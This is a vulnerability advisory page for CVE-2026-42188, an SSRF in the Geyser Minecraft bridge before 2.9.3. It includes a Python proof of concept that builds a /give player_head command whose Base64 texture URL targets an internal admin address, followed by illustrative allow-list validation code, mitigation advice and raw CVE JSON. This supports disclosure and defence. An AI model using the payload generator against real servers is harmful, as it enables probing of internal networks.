Security Vulnerability Report
CVE-2026-42188 CVSS 2.4 LOW

CVE-2026-42188

Published: 2026-05-11 22:22:11
Last Modified: 2026-05-11 22:22:11

Description

Geyser is a bridge between Minecraft: Bedrock Edition and Minecraft: Java Edition. Prior to 2.9.3, a server-side request forgery (SSRF) vulnerability exists in Geyser’s handling of Bedrock player head texture data. By supplying a crafted Base64-encoded skin texture URL via the /give command, an attacker can cause the Minecraft server to issue arbitrary HTTP GET requests to attacker-controlled or internal endpoints. This occurs server-side, without proper URL validation, and can be triggered by a Bedrock client. This vulnerability is fixed in 2.9.3.

CVSS Details

CVSS Score
2.4
Severity
LOW
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Geyser < 2.9.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# PoC Concept for CVE-2026-42188
# This Python script generates a Minecraft /give command that triggers the SSRF.
import base64
import json


def generate_malicious_command(target_url):
    # Create the JSON structure for the texture
    texture_data = {
        "url": target_url
    }
    # Encode to Base64 (Minecraft texture format requirement)
    encoded_bytes = base64.b64encode(json.dumps(texture_data).encode("utf-8"))
    encoded_string = encoded_bytes.decode("utf-8")
    # Construct the /give command with NBT data
    # This gives the player a player_head with the malicious texture
    command = (
        f'/give @p minecraft:player_head{{SkullOwner:{{Id:"IcyRex",'
        f'Properties:{{textures:[{{Value:"{encoded_string}"}}]}}}}}}'
    )
    return command


if __name__ == "__main__":
    # Example: Targeting an internal admin panel or metadata service
    target = "http://127.0.0.1:8080/admin"
    print(f"Target: {target}")
    print("Run this command in the Minecraft server console or as an OP player:")
    print(generate_malicious_command(target))
```
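The description states that the server fetched the decoded texture URL without proper URL validation. The following is an added example of the kind of check that closes this class of SSRF: decode the Base64 `textures` property, extract the URL, and only allow an `https` URL whose host is on an explicit allow-list, rejecting literal IP addresses, embedded credentials and non-standard ports. This is illustrative code written for this page, not Geyser's own code or its actual 2.9.3 fix; the allow-listed host `textures.minecraft.net`, the nested `{"textures": {"SKIN": {"url": ...}}}` layout and the function names are assumptions. The flat `{"url": ...}` shape used by the PoC above is handled as well.

```python
# Added example, not Geyser's code: validate a player-head texture value
# before any server-side HTTP fetch is made on its behalf.
import base64
import ipaddress
import json
from typing import Optional
from urllib.parse import urlsplit

# Assumed allow-list: the only host a skin texture may legitimately point at.
ALLOWED_TEXTURE_HOSTS = {"textures.minecraft.net"}


def extract_texture_url(encoded_value: str) -> Optional[str]:
    """Decode a Base64 'textures' property value and return the skin URL,
    or None if the value is not well-formed. Accepts the flat {"url": ...}
    shape and the nested {"textures": {"SKIN": {"url": ...}}} shape
    (the nested layout is an assumption for this example)."""
    try:
        raw = base64.b64decode(encoded_value, validate=True)
        data = json.loads(raw.decode("utf-8"))
    except (ValueError, UnicodeDecodeError):
        return None
    if not isinstance(data, dict):
        return None
    url = data.get("url")
    if url is None:
        textures = data.get("textures")
        if isinstance(textures, dict):
            skin = textures.get("SKIN")
            if isinstance(skin, dict):
                url = skin.get("url")
    return url if isinstance(url, str) else None


def is_safe_texture_url(url: str) -> bool:
    """Return True only for an https URL on an allow-listed host with no
    embedded credentials, no literal IP address and no unusual port."""
    try:
        parts = urlsplit(url)
        host = parts.hostname          # already lower-cased, brackets stripped
        port = parts.port              # raises ValueError on a bad port
    except ValueError:
        return False
    if parts.scheme != "https" or not host:
        return False
    if parts.username or parts.password:      # rejects "allowed-host@evil" tricks
        return False
    try:
        ipaddress.ip_address(host)            # any literal IP (127.0.0.1, ::1, ...)
        return False
    except ValueError:
        pass                                  # not an IP literal, carry on
    if port not in (None, 443):
        return False
    return host in ALLOWED_TEXTURE_HOSTS


def validate_texture_value(encoded_value: str) -> bool:
    """Full check a server would run before fetching anything for this value."""
    url = extract_texture_url(encoded_value)
    return url is not None and is_safe_texture_url(url)


# Constructed sample values for demonstration (not taken from any real server).
SAMPLE_SSRF_VALUE = base64.b64encode(
    json.dumps({"url": "http://127.0.0.1:8080/admin"}).encode("utf-8")
).decode("utf-8")
SAMPLE_VALID_VALUE = base64.b64encode(
    json.dumps({"textures": {"SKIN": {
        "url": "https://textures.minecraft.net/texture/abc123"}}}).encode("utf-8")
).decode("utf-8")

if __name__ == "__main__":
    for label, value in (("ssrf-style", SAMPLE_SSRF_VALUE),
                         ("legitimate", SAMPLE_VALID_VALUE)):
        print(f"{label}: url={extract_texture_url(value)!r} "
              f"allowed={validate_texture_value(value)}")
```

A hostname allow-list is the right first gate, but it is not sufficient on its own: the connecting code should also resolve the name and refuse to connect to private, loopback or link-local addresses at connect time (and not follow redirects blindly), otherwise DNS rebinding or an open redirect on the allowed host can still turn the fetch into an internal request.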

References

Raw JSON Data

```json
{"cve": {"id": "CVE-2026-42188", "sourceIdentifier": "[email protected]", "published": "2026-05-11T22:22:11.277", "lastModified": "2026-05-11T22:22:11.277", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "Geyser is a bridge between Minecraft: Bedrock Edition and Minecraft: Java Edition. Prior to 2.9.3, a server-side request forgery (SSRF) vulnerability exists in Geyser’s handling of Bedrock player head texture data. By supplying a crafted Base64-encoded skin texture URL via the /give command, an attacker can cause the Minecraft server to issue arbitrary HTTP GET requests to attacker-controlled or internal endpoints. This occurs server-side, without proper URL validation, and can be triggered by a Bedrock client. This vulnerability is fixed in 2.9.3."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:N/A:N", "baseScore": 2.4, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 0.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-918"}]}], "references": [{"url": "https://github.com/GeyserMC/Geyser/security/advisories/GHSA-xcfg-fcr5-gw9r", "source": "[email protected]"}]}}
```